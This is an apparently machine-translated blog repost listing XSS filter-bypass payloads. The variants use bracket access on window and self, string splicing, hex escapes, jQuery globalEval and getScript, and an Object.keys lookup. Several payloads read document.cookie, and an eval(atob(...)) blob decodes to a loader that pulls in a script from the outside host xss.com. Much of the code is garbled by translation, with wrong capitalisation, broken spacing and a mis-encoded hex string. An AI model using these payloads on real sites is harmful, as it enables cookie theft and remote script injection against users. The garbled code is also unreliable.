XSS various variants bypass filter (Various variations bypass the XSS filter)
Article from: https://www.cnblogs.com/iAmSoScArEd/p/11287928.html I am super afraid of
Etc. using the window manipulation would be considered a global variable window.self the self same effect
1、window
window["document"]["cookie"] //代替document.cookie
2、window
window['alert'](["document"]["cookie"]); //代替 alert(document.cookie)
3、self
Self [ "alert"] ( "123xss"); // replace conventional alert
4 comments
( / * Hello * / Self / * Safe * / ) [ / * NO * / "alert" / * Alarm * / ] ( "123xss"); // replace conventional alert
5, using splicing (self window replacing the same effect)
self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"]) ;//代替传统alert
6, using a hexadecimal (self window replacing the same effect)
self["\x61\x6c\x65\x72\x74"]( self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"] ["\x63\x6f\x6f\x6b\x69\x65"] ) //alert(document.cookie)
7, using BASE64 (self window replacing the same effect)
Self [ "\ X65 \ X76 \ X61 \ X6C"] ( // the eval Self [ "\ X61 \ X74 \ x6f \ X62"] ( // atoB Base-64 decoding method, base-64 encoding method is used btoa () "dmFyIGhlYWQgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCk7dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3NjcmlwdC5zZXRBdHRyaWJ1dGUoJ3R5cGUnLCAndGV4dC9qYXZhc2NyaXB0Jyk7c2NyaXB0LnNldEF0dHJpYnV0ZSgnc3JjJywgJ2h0dHA6Ly94c3MuY29tL3hzcy5qcycpO2hlYWQuYXBwZW5kQ2hpbGQoc2NyaXB0KTs =" ) ) // var = document.getElementsByTagName head ( 'head') Item (0);. var Script = document.createElement ( 'Script'); script.setAttribute ( 'type', 'text / JavaScript' ); script.setAttribute ( 'src', 'http://xss.com/xss.js');head.appendChild(script);
8, the use of JQuery
1) self["$"]["globalEval"]("alert(123)"); //alert(123)
2) self["\x24"](//$
self["\x67\x6c\x6f\x62\x61\x6c\x45\x76\x61\x64"]//globalEval
["\x61\x6c\x65\x72\x74\x28\x31\x32\x33\x29"] //alert(123)
)
3) self["$"]["getScript"](url). getScript //从url获取js脚本
9, use Object.keys
0 = A; for (I in Self) { IF (I == "alert") {the console.log (A);} A ++;} // Get alert location in the array self [Object.keys (self) [ 7]] ( "123") // assumed that the execution result by the execution code 7 effect: alert ( "123")
// If we are not allowed to use the "alert" string, and the above methods can not be used,
// how do we find the "alert" the index it? JavaScript can solve this problem.
// we have to do is assign a function to a variable (a), the function iterative self and find the alarm index.
// then we can use the test () to locate with the regular expression "alert", such as A ^ [the rel] + $ T: A = function () { C = 0 ; for (I in Self) { IF (/^a[rel]+t$/.test(i)) return C; C ++ ; } } A = () => C = {0; for (I in Self) { IF (/ ^ A [ the rel] + T $ /. Test (I)) { return C C ++} }} Self [Object.keys (Self) [A ()]] ("123") // alert("123")
Above ideas from screaming.